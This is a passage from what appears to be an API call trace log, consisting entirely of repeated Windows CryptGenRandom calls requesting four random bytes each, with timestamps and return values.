pbBuffer=0x2d7e150 | out: pbBuffer=0x2d7e150) returned 1 [0160.151] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e150 | out: pbBuffer=0x2d7e150) returned 1 [0160.151] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e150 | out: pbBuffer=0x2d7e150) returned 1 [0160.151] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e150 | out: pbBuffer=0x2d7e150) returned 1 [0160.151] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e150 | out: pbBuffer=0x2d7e150) returned 1 [0160.151] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e150 | out: pbBuffer=0x2d7e150) returned 1 [0160.151] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e150 | out: pbBuffer=0x2d7e150) returned 1 [0160.151] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e150 | out: pbBuffer=0x2d7e150) returned 1 [0160.151] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e150 | out: pbBuffer=0x2d7e150) returned 1 [0160.151] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e150 | out: pbBuffer=0x2d7e150) returned 1 [0160.151] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e150 | out: pbBuffer=0x2d7e150) returned 1 [0160.151] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e150 | out: pbBuffer=0x2d7e150) returned 1 [0160.151] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e150 | out: pbBuffer=0x2d7e150) returned 1 [0160.151] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e150 | out: pbBuffer=0x2d7e150) returned 1 [0160.151] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e150 | out: pbBuffer=0x2d7e150) returned 1 [0160.151] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e150 | out: pbBuffer=0x2d7e150) returned 1 [0160.151] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e150 | out: pbBuffer=0x2d7e150) returned 1 [0160.151] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e150 | out: pbBuffer=0x2d7e150) returned 1 [0160.151] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e150 | out: pbBuffer=0x2d7e150) returned 1 [0160.151] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e150 | out: pbBuffer=0x2d7e150) returned 1 [0160.151] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e150 | out: pbBuffer=0x2d7e150) returned 1 [0160.151] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e150 | out: pbBuffer=0x2d7e150) returned 1 [0160.151] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e150 | out: pbBuffer=0x2d7e150) returned 1 [0160.151] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e150 | out: pbBuffer=0x2d7e150) returned 1 [0160.151] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e150 | out: pbBuffer=0x2d7e150) returned 1 [0160.151] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e150 | out: pbBuffer=0x2d7e150) returned 1 [0160.151] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e150 | out: pbBuffer=0x2d7e150) returned 1 [0160.151] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e150 | out: pbBuffer=0x2d7e150) returned 1 [0160.151] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e150 | out: pbBuffer=0x2d7e150) returned 1 [0160.151] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e150 | out: pbBuffer=0x2d7e150) returned 1 [0160.151] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e150 | out: pbBuffer=0x2d7e150) returned 1 [0160.151] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e150 | out: pbBuffer=0x2d7e150) returned 1 [0160.151] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e150 | out: pbBuffer=0x2d7e150) returned 1 [0160.151] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e150 | out: pbBuffer=0x2d7e150) returned 1 [0160.151] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e150 | out: pbBuffer=0x2d7e150) returned 1 [0160.151] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e150 | out: pbBuffer=0x2d7e150) returned 1 [0160.151] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e150 | out: pbBuffer=0x2d7e150) returned 1 [0160.151] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e150 | out: pbBuffer=0x2d7e150) returned 1 [0160.151] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e150 | out: pbBuffer=0x2d7e150) returned 1 [0160.151] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e150 | out: pbBuffer=0x2d7e150) returned 1 [0160.151] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e150 | out: pbBuffer=0x2d7e150) returned 1 [0160.151] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e150 | out: pbBuffer=0x2d7e150) returned 1 [0160.151] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e150 | out: pbBuffer=0x2d7e150) returned 1 [0160.151] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e150 | out: pbBuffer=0x2d7e150) returned 1 [0160.151] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e150 | out: pbBuffer=0x2d7e150) returned 1 [0160.151] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e150 | out: pbBuffer=0x2d7e150) returned 1 [0160.151] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e150 | out: pbBuffer=0x2d7e150) returned 1 [0160.151] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e150 | out: pbBuffer=0x2d7e150) returned 1 [0160.152] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e150 | out: pbBuffer=0x2d7e150) returned 1 [0160.152] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e150 | out: pbBuffer=0x2d7e150) returned 1 [0160.152] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e150 | out: pbBuffer=0x2d7e150) returned 1 [0160.152] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e150 | out: pbBuffer=0x2d7e150) returned 1 [0160.152] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e150 | out: pbBuffer=0x2d7e150) returned 1 [0160.152] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e150 | out: pbBuffer=0x2d7e150) returned 1 [0160.152] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e150 | out: pbBuffer=0x2d7e150) returned 1 [0160.152] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e150 | out: pbBuffer=0x2d7e150) returned 1 [0160.152] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e150 | out: pbBuffer=0x2d7e150) returned 1 [0160.152] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e150 | out: pbBuffer=0x2d7e150) returned 1 [0160.152] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e150 | out: pbBuffer=0x2d7e150) returned 1 [0160.152] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e150 | out: pbBuffer=0x2d7e150) returned 1 [0160.152] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e150 | out: pbBuffer=0x2d7e150) returned 1 [0160.152] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e150 | out: pbBuffer=0x2d7e150) returned 1 [0160.152] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e150 | out: pbBuffer=0x2d7e150) returned 1 [0160.152] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e150 | out: pbBuffer=0x2d7e150) returned 1 [0160.152] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e150 | out: pbBuffer=0x2d7e150) returned 1 [0160.152] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e150 | out: pbBuffer=0x2d7e150) returned 1 [0160.152] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e150 | out: pbBuffer=0x2d7e150) returned 1 [0160.152] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e150 | out: pbBuffer=0x2d7e150) returned 1 [0160.152] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e150 | out: pbBuffer=0x2d7e150) returned 1 [0160.152] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e150 | out: pbBuffer=0x2d7e150) returned 1 [0160.152] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e150 | out: pbBuffer=0x2d7e150) returned 1 [0160.152] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e150 | out: pbBuffer=0x2d7e150) returned 1 [0160.152] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e150 | out: pbBuffer=0x2d7e150) returned 1 [0160.152] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e150 | out: pbBuffer=0x2d7e150) returned 1 [0160.152] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e150 | out: pbBuffer=0x2d7e150) returned 1 [0160.152] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e150 | out: pbBuffer=0x2d7e150) returned 1 [0160.152] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e150 | out: pbBuffer=0x2d7e150) returned 1 [0160.152] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e150 | out: pbBuffer=0x2d7e150) returned 1 [0160.152] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e150 | out: pbBuffer=0x2d7e150) returned 1 [0160.152] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e150 | out: pbBuffer=0x2d7e150) returned 1 [0160.152] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e150 | out: pbBuffer=0x2d7e150) returned 1 [0160.152] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e150 | out: pbBuffer=0x2d7e150) returned 1 [0160.152] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e150 | out: pbBuffer=0x2d7e150) returned 1 [0160.152] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e150 | out: pbBuffer=0x2d7e150) returned 1 [0160.152] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e150 | out: pbBuffer=0x2d7e150) returned 1 [0160.152] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e150 | out: pbBuffer=0x2d7e150) returned 1 [0160.152] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e150 | out: pbBuffer=0x2d7e150) returned 1 [0160.152] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e150 | out: pbBuffer=0x2d7e150) returned 1 [0160.152] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e150 | out: pbBuffer=0x2d7e150) returned 1 [0160.152] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e150 | out: pbBuffer=0x2d7e150) returned 1 [0160.152] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e150 | out: pbBuffer=0x2d7e150) returned 1 [0160.152] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e150 | out: pbBuffer=0x2d7e150) returned 1 [0160.152] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e150 | out: pbBuffer=0x2d7e150) returned 1 [0160.152] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e150 | out: pbBuffer=0x2d7e150) returned 1 [0160.152] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e150 | out: pbBuffer=0x2d7e150) returned 1 [0160.152] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e150 | out: pbBuffer=0x2d7e150) returned 1 [0160.152] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e150 | out: pbBuffer=0x2d7e150) returned 1 [0160.152] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e150 | out: pbBuffer=0x2d7e150) returned 1 [0160.152] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e150 | out: pbBuffer=0x2d7e150) returned 1 [0160.153] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e150 | out: pbBuffer=0x2d7e150) returned 1 [0160.153] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e150 | out: pbBuffer=0x2d7e150) returned 1 [0160.153] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e150 | out: pbBuffer=0x2d7e150) returned 1 [0160.153] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e150 | out: pbBuffer=0x2d7e150) returned 1 [0160.153] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e150 | out: pbBuffer=0x2d7e150) returned 1 [0160.153] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e150 | out: pbBuffer=0x2d7e150) returned 1 [0160.153] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e150 | out: pbBuffer=0x2d7e150) returned 1 [0160.153] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e150 | out: pbBuffer=0x2d7e150) returned 1 [0160.153] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e150 | out: pbBuffer=0x2d7e150) returned 1 [0160.153] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e150 | out: pbBuffer=0x2d7e150) returned 1 [0160.153] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e150 | out: pbBuffer=0x2d7e150) returned 1 [0160.153] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e150 | out: pbBuffer=0x2d7e150) returned 1 [0160.153] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e150 | out: pbBuffer=0x2d7e150) returned 1 [0160.153] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e150 | out: pbBuffer=0x2d7e150) returned 1 [0160.153] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e150 | out: pbBuffer=0x2d7e150) returned 1 [0160.153] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e150 | out: pbBuffer=0x2d7e150) returned 1 [0160.153] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e150 | out: pbBuffer=0x2d7e150) returned 1 [0160.153] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e150 | out: pbBuffer=0x2d7e150) returned 1 [0160.153] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e150 | out: pbBuffer=0x2d7e150) returned 1 [0160.153] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e150 | out: pbBuffer=0x2d7e150) returned 1 [0160.153] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e150 | out: pbBuffer=0x2d7e150) returned 1 [0160.153] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e150 | out: pbBuffer=0x2d7e150) returned 1 [0160.153] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e150 | out: pbBuffer=0x2d7e150) returned 1 [0160.153] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e150 | out: pbBuffer=0x2d7e150) returned 1 [0160.153] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e150 | out: pbBuffer=0x2d7e150) returned 1 [0160.153] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e150 | out: pbBuffer=0x2d7e150) returned 1 [0160.153] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e150 | out: pbBuffer=0x2d7e150) returned 1 [0160.153] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e150 | out: pbBuffer=0x2d7e150) returned 1 [0160.153] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e150 | out: pbBuffer=0x2d7e150) returned 1 [0160.153] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e150 | out: pbBuffer=0x2d7e150) returned 1 [0160.153] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e150 | out: pbBuffer=0x2d7e150) returned 1 [0160.153] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e150 | out: pbBuffer=0x2d7e150) returned 1 [0160.153] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e150 | out: pbBuffer=0x2d7e150) returned 1 [0160.153] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e150 | out: pbBuffer=0x2d7e150) returned 1 [0160.153] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e150 | out: pbBuffer=0x2d7e150) returned 1 [0160.153] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e150 | out: pbBuffer=0x2d7e150) returned 1 [0160.153] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e150 | out: pbBuffer=0x2d7e150) returned 1 [0160.153] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e150 | out: pbBuffer=0x2d7e150) returned 1 [0160.153] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e150 | out: pbBuffer=0x2d7e150) returned 1 [0160.153] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e150 | out: pbBuffer=0x2d7e150) returned 1 [0160.153] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e150 | out: pbBuffer=0x2d7e150) returned 1 [0160.153] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e150 | out: pbBuffer=0x2d7e150) returned 1 [0160.153] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e150 | out: pbBuffer=0x2d7e150) returned 1 [0160.153] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e150 | out: pbBuffer=0x2d7e150) returned 1 [0160.153] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e150 | out: pbBuffer=0x2d7e150) returned 1 [0160.153] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e150 | out: pbBuffer=0x2d7e150) returned 1 [0160.153] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e150 | out: pbBuffer=0x2d7e150) returned 1 [0160.153] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e150 | out: pbBuffer=0x2d7e150) returned 1 [0160.153] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e150 | out: pbBuffer=0x2d7e150) returned 1 [0160.153] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e150 | out: pbBuffer=0x2d7e150) returned 1 [0160.154] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e150 | out: pbBuffer=0x2d7e150) returned 1 [0160.154] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e150 | out: pbBuffer=0x2d7e150) returned 1 [0160.154] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e150 | out: pbBuffer=0x2d7e150) returned 1 [0160.154] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e150 | out: pbBuffer=0x2d7e150) returned 1 [0160.154] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e150 | out: pbBuffer=0x2d7e150) returned 1 [0160.154] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e150 | out: pbBuffer=0x2d7e150) returned 1 [0160.154] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e150 | out: pbBuffer=0x2d7e150) returned 1 [0160.154] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e150 | out: pbBuffer=0x2d7e150) returned 1 [0160.154] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e150 | out: pbBuffer=0x2d7e150) returned 1 [0160.154] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e150 | out: pbBuffer=0x2d7e150) returned 1 [0160.154] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e150 | out: pbBuffer=0x2d7e150) returned 1 [0160.154] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e150 | out: pbBuffer=0x2d7e150) returned 1 [0160.154] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e150 | out: pbBuffer=0x2d7e150) returned 1 [0160.154] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e150 | out: pbBuffer=0x2d7e150) returned 1 [0160.154] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e150 | out: pbBuffer=0x2d7e150) returned 1 [0160.154] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e150 | out: pbBuffer=0x2d7e150) returned 1 [0160.154] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e150 | out: pbBuffer=0x2d7e150) returned 1 [0160.154] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e150 | out: pbBuffer=0x2d7e150) returned 1 [0160.154] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e150 | out: pbBuffer=0x2d7e150) returned 1 [0160.154] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e150 | out: pbBuffer=0x2d7e150) returned 1 [0160.154] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e150 | out: pbBuffer=0x2d7e150) returned 1 [0160.154] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e150 | out: pbBuffer=0x2d7e150) returned 1 [0160.154] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e150 | out: pbBuffer=0x2d7e150) returned 1 [0160.154] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e150 | out: pbBuffer=0x2d7e150) returned 1 [0160.154] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e150 | out: pbBuffer=0x2d7e150) returned 1 [0160.154] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e150 | out: pbBuffer=0x2d7e150) returned 1 [0160.154] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e150 | out: pbBuffer=0x2d7e150) returned 1 [0160.154] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e150 | out: pbBuffer=0x2d7e150) returned 1 [0160.154] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e150 | out: pbBuffer=0x2d7e150) returned 1 [0160.154] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e150 | out: pbBuffer=0x2d7e150) returned 1 [0160.154] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e150 | out: pbBuffer=0x2d7e150) returned 1 [0160.154] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e150 | out: pbBuffer=0x2d7e150) returned 1 [0160.154] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e150 | out: pbBuffer=0x2d7e150) returned 1 [0160.154] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e150 | out: pbBuffer=0x2d7e150) returned 1 [0160.154] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e150 | out: pbBuffer=0x2d7e150) returned 1 [0160.154] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e150 | out: pbBuffer=0x2d7e150) returned 1 [0160.154] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e150 | out: pbBuffer=0x2d7e150) returned 1 [0160.154] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e150 | out: pbBuffer=0x2d7e150) returned 1 [0160.154] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e150 | out: pbBuffer=0x2d7e150) returned 1 [0160.154] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e150 | out: pbBuffer=0x2d7e150) returned 1 [0160.154] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e150 | out: pbBuffer=0x2d7e150) returned 1 [0160.154] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e150 | out: pbBuffer=0x2d7e150) returned 1 [0160.154] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e150 | out: pbBuffer=0x2d7e150) returned 1 [0160.154] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e150 | out: pbBuffer=0x2d7e150) returned 1 [0160.154] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e150 | out: pbBuffer=0x2d7e150) returned 1 [0160.154] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e150 | out: pbBuffer=0x2d7e150) returned 1 [0160.154] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e150 | out: pbBuffer=0x2d7e150) returned 1 [0160.154] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e150 | out: pbBuffer=0x2d7e150) returned 1 [0160.154] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e150 | out: pbBuffer=0x2d7e150) returned 1 [0160.155] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e150 | out: pbBuffer=0x2d7e150) returned 1 [0160.155] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e150 | out: pbBuffer=0x2d7e150) returned 1 [0160.155] CryptGenRandom (in: hProv=0x8bf310, 